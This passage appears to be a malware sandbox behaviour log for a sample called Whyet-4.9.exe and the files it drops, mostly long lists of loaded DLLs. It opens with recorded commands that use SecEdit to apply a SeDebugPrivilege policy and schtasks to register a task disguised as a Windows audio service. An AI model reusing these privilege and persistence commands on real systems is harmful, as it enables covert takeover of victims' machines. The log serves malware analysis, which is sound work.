Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: lua5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: actxprxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: ntmarta.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: profapi.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: urlmon.dll
